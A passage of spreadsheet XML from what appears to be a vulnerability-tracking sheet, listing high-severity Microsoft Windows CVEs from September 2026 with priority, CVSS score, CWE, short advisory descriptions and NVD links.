s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B971" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C971" s="5" t="inlineStr"><is><t>CVE-2026-69693</t></is></c><c r="D971" s="5" t="n"><v>7</v></c><c r="E971" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F971" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G971" s="5" t="inlineStr" /><c r="H971" s="5" t="n"><v>0.003</v></c><c r="I971" s="5" t="inlineStr" /><c r="J971" s="5" t="inlineStr" /><c r="K971" s="5" t="inlineStr" /><c r="L971" s="5" t="inlineStr" /><c r="M971" s="5" t="inlineStr" /><c r="N971" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O971" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P971" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q971" s="5" t="inlineStr" /><c r="R971" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S971" s="5" t="inlineStr"><is><t>Use after free in Windows Device Association Broker service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T971" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69693</t></is></c></row><row r="972"><c r="A972" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B972" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C972" s="5" t="inlineStr"><is><t>CVE-2026-69694</t></is></c><c r="D972" s="5" t="n"><v>7</v></c><c r="E972" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F972" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G972" s="5" t="inlineStr" /><c r="H972" s="5" t="n"><v>0.017</v></c><c r="I972" s="5" t="inlineStr" /><c r="J972" s="5" t="inlineStr" /><c r="K972" s="5" t="inlineStr" /><c r="L972" s="5" t="inlineStr" /><c r="M972" s="5" t="inlineStr" /><c r="N972" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O972" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P972" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q972" s="5" t="inlineStr" /><c r="R972" s="5" t="inlineStr"><is><t>CWE-502</t></is></c><c r="S972" s="5" t="inlineStr"><is><t>Deserialization of untrusted data in Windows IP Address Management (IPAM) Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T972" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69694</t></is></c></row><row r="973"><c r="A973" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B973" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C973" s="5" t="inlineStr"><is><t>CVE-2026-69708</t></is></c><c r="D973" s="5" t="n"><v>7</v></c><c r="E973" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F973" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G973" s="5" t="inlineStr" /><c r="H973" s="5" t="n"><v>0.003</v></c><c r="I973" s="5" t="inlineStr" /><c r="J973" s="5" t="inlineStr" /><c r="K973" s="5" t="inlineStr" /><c r="L973" s="5" t="inlineStr" /><c r="M973" s="5" t="inlineStr" /><c r="N973" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O973" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P973" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q973" s="5" t="inlineStr" /><c r="R973" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S973" s="5" t="inlineStr"><is><t>Use after free in Windows Web Platform Storage allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T973" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69708</t></is></c></row><row r="974"><c r="A974" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B974" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C974" s="5" t="inlineStr"><is><t>CVE-2026-69711</t></is></c><c r="D974" s="5" t="n"><v>7</v></c><c r="E974" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F974" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G974" s="5" t="inlineStr" /><c r="H974" s="5" t="n"><v>0.003</v></c><c r="I974" s="5" t="inlineStr" /><c r="J974" s="5" t="inlineStr" /><c r="K974" s="5" t="inlineStr" /><c r="L974" s="5" t="inlineStr" /><c r="M974" s="5" t="inlineStr" /><c r="N974" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O974" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P974" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q974" s="5" t="inlineStr" /><c r="R974" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S974" s="5" t="inlineStr"><is><t>Use after free in Windows Device Association Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T974" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69711</t></is></c></row><row r="975"><c r="A975" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B975" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C975" s="5" t="inlineStr"><is><t>CVE-2026-69735</t></is></c><c r="D975" s="5" t="n"><v>7</v></c><c r="E975" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F975" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G975" s="5" t="inlineStr" /><c r="H975" s="5" t="n"><v>0.003</v></c><c r="I975" s="5" t="inlineStr" /><c r="J975" s="5" t="inlineStr" /><c r="K975" s="5" t="inlineStr" /><c r="L975" s="5" t="inlineStr" /><c r="M975" s="5" t="inlineStr" /><c r="N975" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O975" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P975" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q975" s="5" t="inlineStr" /><c r="R975" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S975" s="5" t="inlineStr"><is><t>Use after free in Windows Broadcast DVR User Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T975" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69735</t></is></c></row><row r="976"><c r="A976" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B976" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C976" s="5" t="inlineStr"><is><t>CVE-2026-69779</t></is></c><c r="D976" s="5" t="n"><v>7</v></c><c r="E976" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F976" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G976" s="5" t="inlineStr" /><c r="H976" s="5" t="n"><v>0.002</v></c><c r="I976" s="5" t="inlineStr" /><c r="J976" s="5" t="inlineStr" /><c r="K976" s="5" t="inlineStr" /><c r="L976" s="5" t="inlineStr" /><c r="M976" s="5" t="inlineStr" /><c r="N976" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O976" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P976" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q976" s="5" t="inlineStr" /><c r="R976" s="5" t="inlineStr"><is><t>CWE-367</t></is></c><c r="S976" s="5" t="inlineStr"><is><t>Time-of-ch</t></is></c><c r="T976" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69779</t></is></c></row><row r="977"><c r="A977" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B977" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C977" s="5" t="inlineStr"><is><t>CVE-2026-69791</t></is></c><c r="D977" s="5" t="n"><v>7</v></c><c r="E977" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F977" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G977" s="5" t="inlineStr" /><c r="H977" s="5" t="n"><v>0.003</v></c><c r="I977" s="5" t="inlineStr" /><c r="J977" s="5" t="inlineStr" /><c r="K977" s="5" t="inlineStr" /><c r="L977" s="5" t="inlineStr" /><c r="M977" s="5" t="inlineStr" /><c r="N977" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O977" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P977" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q977" s="5" t="inlineStr" /><c r="R977" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S977" s="5" t="inlineStr"><is><t>Use after free in Windows Device Association Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T977" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69791</t></is></c></row><row r="978"><c r="A978" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B978" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C978" s="5" t="inlineStr"><is><t>CVE-2026-69806</t></is></c><c r="D978" s="5" t="n"><v>7</v></c><c r="E978" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F978" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G978" s="5" t="inlineStr" /><c r="H978" s="5" t="n"><v>0.018</v></c><c r="I978" s="5" t="inlineStr" /><c r="J978" s="5" t="inlineStr" /><c r="K978" s="5" t="inlineStr" /><c r="L978" s="5" t="inlineStr" /><c r="M978" s="5" t="inlineStr" /><c r="N978" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O978" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P978" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q978" s="5" t="inlineStr" /><c r="R978" s="5" t="inlineStr"><is><t>CWE-200, CWE-94</t></is></c><c r="S978" s="5" t="inlineStr"><is><t>Exposure of sensitive information to an unauthorized actor in .NET allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T978" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69806</t></is></c></row><row r="979"><c r="A979" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B979" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C979" s="5" t="inlineStr"><is><t>CVE-2026-69814</t></is></c><c r="D979" s="5" t="n"><v>7</v></c><c r="E979" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F979" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G979" s="5" t="inlineStr" /><c r="H979" s="5" t="n"><v>0.003</v></c><c r="I979" s="5" t="inlineStr" /><c r="J979" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K979" s="5" t="inlineStr"><is><t>microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2025</t></is></c><c r="L979" s="5" t="inlineStr" /><c r="M979" s="5" t="inlineStr" /><c r="N979" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O979" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P979" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q979" s="5" t="inlineStr" /><c r="R979" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S979" s="5" t="inlineStr"><is><t>Use after free in Windows Credential Providers allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T979" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69814</t></is></c></row><row r="980"><c r="A980" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B980" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C980" s="5" t="inlineStr"><is><t>CVE-2026-69816</t></is></c><c r="D980" s="5" t="n"><v>7</v></c><c r="E980" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F980" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G980" s="5" t="inlineStr" /><c r="H980" s="5" t="n"><v>0.003</v></c><c r="I980" s="5" t="inlineStr" /><c r="J980" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K98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80" s="5" t="inlineStr" /><c r="M980" s="5" t="inlineStr" /><c r="N980" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O980" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P980" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q980" s="5" t="inlineStr" /><c r="R980" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S980" s="5" t="inlineStr"><is><t>Use after free in Windows Accounts Control allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T980" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69816</t></is></c></row><row r="981"><c r="A981" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B981" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C981" s="5" t="inlineStr"><is><t>CVE-2026-69817</t></is></c><c r="D981" s="5" t="n"><v>7</v></c><c r="E981" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F981" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G981" s="5" t="inlineStr" /><c r="H981" s="5" t="n"><v>0.003</v></c><c r="I981" s="5" t="inlineStr" /><c r="J981" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K9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1" s="5" t="inlineStr" /><c r="M981" s="5" t="inlineStr" /><c r="N981" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O981" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P981" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q981" s="5" t="inlineStr" /><c r="R981" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S981" s="5" t="inlineStr"><is><t>Use after free in Windows Bluetooth Port Driver allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T981" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69817</t></is></c></row><row r="982"><c r="A982" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B982" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C982" s="5" t="inlineStr"><is><t>CVE-2026-69818</t></is></c><c r="D982" s="5" t="n"><v>7</v></c><c r="E982" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F982" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G982" s="5" t="inlineStr" /><c r="H982" s="5" t="n"><v>0.003</v></c><c r="I982" s="5" t="inlineStr" /><c r="J982" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K982" s="5" t="inlineStr"><is><t>microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2025</t></is></c><c r="L982" s="5" t="inlineStr" /><c r="M982" s="5" t="inlineStr" /><c r="N982" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O982" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P982" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q982" s="5" t="inlineStr" /><c r="R982" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S982" s="5" t="inlineStr"><is><t>Use after free in Windows Win32K allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T982" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69818</t></is></c></row><row r="983"><c r="A983" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B983" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C983" s="5" t="inlineStr"><is><t>CVE-2026-69834</t></is></c><c r="D983" s="5" t="n"><v>7</v></c><c r="E983" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F983" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G983" s="5" t="inlineStr" /><c r="H983" s="5" t="n"><v>0.003</v></c><c r="I983" s="5" t="inlineStr" /><c r="J983" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K9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3" s="5" t="inlineStr" /><c r="M983" s="5" t="inlineStr" /><c r="N983" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O983" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P983" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q983" s="5" t="inlineStr" /><c r="R983" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S983" s="5" t="inlineStr"><is><t>Use after free in Windows ALPC allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T983" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69834</t></is></c></row><row r="984"><c r="A984" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B984" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C984" s="5" t="inlineStr"><is><t>CVE-2026-69838</t></is></c><c r="D984" s="5" t="n"><v>7</v></c><c r="E984" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F984" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G984" s="5" t="inlineStr" /><c r="H984" s="5" t="n"><v>0.003</v></c><c r="I984" s="5" t="inlineStr" /><c r="J984" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K98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4" s="5" t="inlineStr" /><c r="M984" s="5" t="inlineStr" /><c r="N984" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O984" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P984" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q984" s="5" t="inlineStr" /><c r="R984" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S984" s="5" t="inlineStr"><is><t>Use after free in Windows Print Spooler Components allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T984" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69838</t></is></c></row><row r="985"><c r="A985" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B985" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C985" s="5" t="inlineStr"><is><t>CVE-2026-69859</t></is></c><c r="D985" s="5" t="n"><v>7</v></c><c r="E985" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F985" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G985" s="5" t="inlineStr" /><c r="H985" s="5" t="n"><v>0.002</v></c><c r="I985" s="5" t="inlineStr" /><c r="J985" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K9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5" s="5" t="inlineStr" /><c r="M985" s="5" t="inlineStr" /><c r="N985" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O985" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P985" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q985" s="5" t="inlineStr" /><c r="R985" s="5" t="inlineStr"><is><t>CWE-191, CWE-367</t></is></c><c r="S985" s="5" t="inlineStr"><is><t>Time-of-ch</t></is></c><c r="T985" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69859</t></is></c></row><row r="986"><c r="A986" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B986" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C986" s="5" t="inlineStr"><is><t>CVE-2026-69866</t></is></c><c r="D986" s="5" t="n"><v>7</v></c><c r="E986" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F986" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G986" s="5" t="inlineStr" /><c r="H986" s="5" t="n"><v>0.003</v></c><c r="I986" s="5" t="inlineStr" /><c r="J986" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K98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86" s="5" t="inlineStr" /><c r="M986" s="5" t="inlineStr" /><c r="N986" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O986" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P986" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q986" s="5" t="inlineStr" /><c r="R986" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S986" s="5" t="inlineStr"><is><t>Use after free in Windows Device Association Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T986" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69866</t></is></c></row><row r="987"><c r="A987" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B987" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C987" s="5" t="inlineStr"><is><t>CVE-2026-69889</t></is></c><c r="D987" s="5" t="n"><v>7</v></c><c r="E987" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F987" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G987" s="5" t="inlineStr" /><c r="H987" s="5" t="n"><v>0.003</v></c><c r="I987" s="5" t="inlineStr" /><c r="J987" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K98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87" s="5" t="inlineStr" /><c r="M987" s="5" t="inlineStr" /><c r="N987" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O987" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P987" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q987" s="5" t="inlineStr" /><c r="R987" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S987" s="5" t="inlineStr"><is><t>Use after free in Windows Bluetooth Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T987" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69889</t></is></c></row><row r="988"><c r="A988" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B988" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C988" s="5" t="inlineStr"><is><t>CVE-2026-69891</t></is></c><c r="D988" s="5" t="n"><v>7</v></c><c r="E988" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F988" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G988" s="5" t="inlineStr" /><c r="H988" s="5" t="n"><v>0.003</v></c><c r="I988" s="5" t="inlineStr" /><c r="J988" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K9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88" s="5" t="inlineStr" /><c r="M988" s="5" t="inlineStr" /><c r="N988" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O988" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P988" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q988" s="5" t="inlineStr" /><c r="R988" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S988" s="5" t="inlineStr"><is><t>Use after free in Windows Media allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T988" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69891</t></is></c></row><row r="989"><c r="A989" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B989" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C989" s="5" t="inlineStr"><is><t>CVE-2026-69896</t></is></c><c r="D989" s="5" t="n"><v>7</v></c><c r="E989" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F989" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G989" s="5" t="inlineStr" /><c r="H989" s="5" t="n"><v>0.003</v></c><c r="I989" s="5" t="inlineStr" /><c r="J989" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K989" s="5" t="inlineStr"><is><t>microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2025</t></is></c><c r="L989" s="5" t="inlineStr" /><c r="M989" s="5" t="inlineStr" /><c r="N989" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O989" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P989" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q989" s="5" t="inlineStr" /><c r="R989" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S989" s="5" t="inlineStr"><is><t>Use after free in Windows Error Reporting allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T989" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69896</t></is></c></row><row r="990"><c r="A990" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B990" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C990" s="5" t="inlineStr"><is><t>CVE-2026-69911</t></is></c><c r="D990" s="5" t="n"><v>7</v></c><c r="E990" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F990" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G990" s="5" t="inlineStr" /><c r="H990" s="5" t="n"><v>0.003</v></c><c r="I990" s="5" t="inlineStr" /><c r="J990" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K99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0" s="5" t="inlineStr" /><c r="M990" s="5" t="inlineStr" /><c r="N990" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O990" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P990" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q990" s="5" t="inlineStr" /><c r="R990" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S990" s="5" t="inlineStr"><is><t>Use after free in Microsoft Windows Search Component allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T990" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69911</t></is></c></row><row r="991"><c r="A991" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B991" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C991" s="5" t="inlineStr"><is><t>CVE-2026-70283</t></is></c><c r="D991" s="5" t="n"><v>7</v></c><c r="E991" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F991" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G991" s="5" t="inlineStr" /><c r="H991" s="5" t="n"><v>0.002</v></c><c r="I991" s="5" t="inlineStr" /><c r="J991" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K9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1" s="5" t="inlineStr" /><c r="M991" s="5" t="inlineStr" /><c r="N991" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O991" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P991" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q991" s="5" t="inlineStr" /><c r="R991" s="5" t="inlineStr"><is><t>CWE-863</t></is></c><c r="S991" s="5" t="inlineStr"><is><t>Incorrect authorization in Windows Win32K allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T991" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-70283</t></is></c></row><row r="992"><c r="A992" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B992" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C992" s="5" t="inlineStr"><is><t>CVE-2026-70562</t></is></c><c r="D992" s="5" t="n"><v>7</v></c><c r="E992" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F992" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G992" s="5" t="inlineStr" /><c r="H992" s="5" t="n"><v>0.003</v></c><c r="I992" s="5" t="inlineStr" /><c r="J992" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K99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2" s="5" t="inlineStr" /><c r="M992" s="5" t="inlineStr" /><c r="N992" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O992" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P992" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q992" s="5" t="inlineStr" /><c r="R992" s="5" t="inlineStr"><is><t>CWE-415</t></is></c><c r="S992" s="5" t="inlineStr"><is><t>Double free in Windows Audio Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T992" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-70562</t></is></c></row><row r="993"><c r="A993" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B993" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C993" s="5" t="inlineStr"><is><t>CVE-2026-70565</t></is></c><c r="D993" s="5" t="n"><v>7</v></c><c r="E993" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F993" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G993" s="5" t="inlineStr" /><c r="H993" s="5" t="n"><v>0.003</v></c><c r="I993" s="5" t="inlineStr" /><c r="J993" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K99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3" s="5" t="inlineStr" /><c r="M993" s="5" t="inlineStr" /><c r="N993" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O993" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P993" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q993" s="5" t="inlineStr" /><c r="R993" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S993" s="5" t="inlineStr"><is><t>Use after free in Windows AF_UNIX Socket Provider allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T993" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-70565</t></is></c></row><row r="994"><c r="A994" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B994" s="5" 